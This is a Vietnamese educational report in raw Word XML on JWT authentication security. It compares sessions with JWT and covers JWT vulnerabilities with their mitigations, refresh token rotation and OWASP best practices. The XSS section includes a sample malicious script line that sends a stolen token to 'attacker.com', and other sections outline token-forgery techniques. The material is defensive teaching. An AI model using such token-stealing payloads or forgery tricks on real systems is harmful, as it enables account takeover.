    <w:bookmarkStart w:id="24" w:name="bảng-so-sánh"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.2 Bảng so sánh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30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Session-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT-based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Lưu trạng thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server lưu session (stateful)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không lưu trạng thái (stateless)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phía server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Session store (RAM/DB/Redis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không cần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Khả năng mở rộng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Khó scale ngang (cần chia sẻ session)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dễ scale ngang (mỗi server tự verify)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Khó (cookie bị giới hạn domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dễ (token gửi qua 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Mobile-friendly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không tối ưu (mobile không hỗ trợ cookie tốt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tối ưu (gửi qua HTTP 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hồi quyền</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dễ (xóa session trong DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Khó (token valid đến khi hết hạn)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Nhỏ (chỉ Session ID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lớn hơn (chứa claims)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Lỗ hổng chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CSRF, Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS, Token Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="ưu-điểm-của-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.3 Ưu điểm của JWT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Stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Server không cần lưu trạng thái, giảm tải bộ nhớ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Scalable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Phù hợp kiến trúc microservices, load balancing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Cross-domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Hoạt động tốt trên nhiều domain khác nhau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Self-contained</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Token tự chứa thông tin user, giảm truy vấn DB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Mobile-ready</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Truyền dễ dàng qua HTTP Authorization Header</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="nhược-điểm-của-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.4 Nhược điểm của JWT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Không thể thu hồi tức thì</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Token vẫn hợp lệ cho đến khi hết hạn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Kích thước lớn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Payload chứa nhiều claims → tăng băng thông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Không mã hóa payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Thông tin có thể bị đọc (chỉ chống giả mạo)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Phức tạp hơn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Cần quản lý thời hạn token, cơ chế refresh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Rủi ro lưu trữ client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Token lưu ở localStorage dễ bị XSS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các-lỗ-hổng-bảo-mật-của-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Các lỗ hổng bảo mật của JWT</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="tấn-công-none-algorithm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.1 Tấn công</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“None”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Algorithm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Kẻ tấn công sửa header từ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"alg": "HS256"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"alg": "none"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, bỏ phần Signature. Nếu server không kiểm tra thuật toán nghiêm ngặt, nó sẽ chấp nhận token không có chữ ký.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Luôn xác minh trường</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trong header, từ chối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.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="weak-secret-key-khóa-bí-mật-yếu"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.2 Weak Secret Key (Khóa bí mật yếu)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Nếu secret key quá ngắn hoặc dễ đoán (ví dụ:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"secret"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"123456"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), kẻ tấn công có thể brute-force để tìm ra key, sau đó tự ký JWT giả mạo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sử dụng key đủ dài (tối thiểu 256 bits cho HS256), ngẫu nhiên, và bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="algorithm-confusion-nhầm-lẫn-thuật-toán"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.3 Algorithm Confusion (Nhầm lẫn thuật toán)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Server được cấu hình dùng RS256 (asymmetric). Kẻ tấn công đổi header thành</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"alg": "HS256"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">và ký token bằng public key (vốn công khai). Nếu server không kiểm tra, nó sẽ dùng public key làm HMAC secret → chấp nhận token giả.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cố định thuật toán phía server, không cho client quyết định.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="cross-site-scripting-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.4 Cross-Site Scripting (XSS)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Nếu token được lưu trong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kẻ tấn công có thể inject JavaScript vào trang web để đánh cắp token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Mã độc XSS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'https://attacker.com/steal?token='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Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Lưu token trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(JavaScript không truy cập được)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sanitize tất cả input từ user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sử dụng Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="replay-attack-tấn-công-phát-lại"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.5 Replay Attack (Tấn công phát lại)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Kẻ tấn công bắt được JWT hợp lệ (qua network sniffing) và gửi lại để giả mạo danh tính.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Thời hạn token ngắn (Access Token: 15-30 phút lý tưởng)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sử dụng HTTPS bắt buộc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Claim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(JWT ID) duy nhất cho mỗi token</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="token-theft-qua-man-in-the-middle-mitm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5.6 Token Theft qua Man-in-the-Middle (MITM)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Nếu ứng dụng không dùng HTTPS, kẻ tấn công có thể chặn bắt token trên đường truyền.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phòng chống:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bắt buộc HTTPS cho toàn bộ hệ thống.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refresh-token-và-refresh-token-rotation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 Refresh Token và Refresh Token Rotation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="35" w:name="vấn-đề"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6.1 Vấn đề</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access Token có thời hạn ngắn để giảm rủi ro → user phải đăng nhập lại liên tục → trải nghiệm kém.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="giải-pháp-refresh-token"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6.2 Giải pháp: Refresh Token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36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token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  <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thời hạn điển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JWT, gửi kèm mỗi API request, thời hạn ngắn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 phút – 4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Chuỗi ngẫu nhiên, lưu trong DB, dùng để lấy Access Token mới</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7 – 30 ngày</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="refresh-token-rotation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6.3 Refresh Token Rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh Token Rotation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là cơ chế bảo mật nâng cao: mỗi khi Refresh Token được sử dụng, server sẽ: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Thu hồi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(revoke) Refresh Token cũ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Phát hành</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Refresh Token mới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Liên kết</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">token cũ → token mới (truy vết chuỗi token)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Phát hành</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Access Token mới</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lợi ích:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Nếu Refresh Token bị đánh cắp, kẻ tấn công chỉ dùng được</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 lần</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Lần tiếp theo, token đã bị thu hồi → bị từ chối</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Server có thể phát hiện token bị tái sử dụng → cảnh báo / khóa tài khoản</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="sơ-đồ-hoạt-động-refresh-token-rotation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6.4 Sơ đồ hoạt động Refresh Token Rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lần 1 (Login):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Server → Access Token A1 + Refresh Token R1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lần 2 (R1 hết hạn Access Token):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Client gửi R1 → Server thu hồi R1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Server → Access Token A2 + Refresh Token R2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lần 3 (Kẻ tấn công dùng R1 đã bị đánh cắp):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Client gửi R1 → R1 đã bị thu hồi → TỪ CHỐI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Phát hiện tấn công → Có thể khóa toàn bộ chuỗi token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best-practices-bảo-mật-jwt-theo-owasp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 Best Practices bảo mật JWT (theo OWASP)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462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Best Practice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Token thời hạn ngắn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15–30 phút, giới hạn cửa sổ tấn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 lưu server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lưu trong database, không chỉ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 Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mỗi lần dùng tạo token mới, thu hồi token cũ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 bắt buộc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chống MITM, bảo vệ token trên đường truyền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HttpOnly Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chống XSS, JavaScript không truy cập được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Key đủ mạnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tối thiểu 256 bits, ngẫu nhiên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thuật toán</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cố định</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alg</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">phía server, từ chối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lưu thông tin nhạy cảm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Payload không mã hóa, không đặt password/PII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Giới hạn số request tới auth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Brute-force Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Khóa tài khoản sau N lần đăng nhập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Revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hỗ trợ thu hồi token khi logout hoặc phát hiện bất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Ghi nhận Login History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Theo dõi IP, User-Agent, thời gian đăng nhập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ài-liệu-tham-khảo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8 Tài liệu tham khảo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RFC 7519</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— JSON Web Token (JWT), IETF, May 2015. https://datatracker.ietf.org/doc/html/rfc7519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RFC 7518</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— JSON Web Algorithms (JWA), IETF, May 2015. https://datatracker.ietf.org/doc/html/rfc7518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— JSON Web Token Cheat Sheet. https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html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Auth0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Introduction to JSON Web Tokens. https://jwt.io/introduction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— OAuth 2.0 Cheatsheet (Refresh Token Rotation). https://cheatsheetseries.owasp.org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2026-03-06T08:51:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-06T08:51:24Z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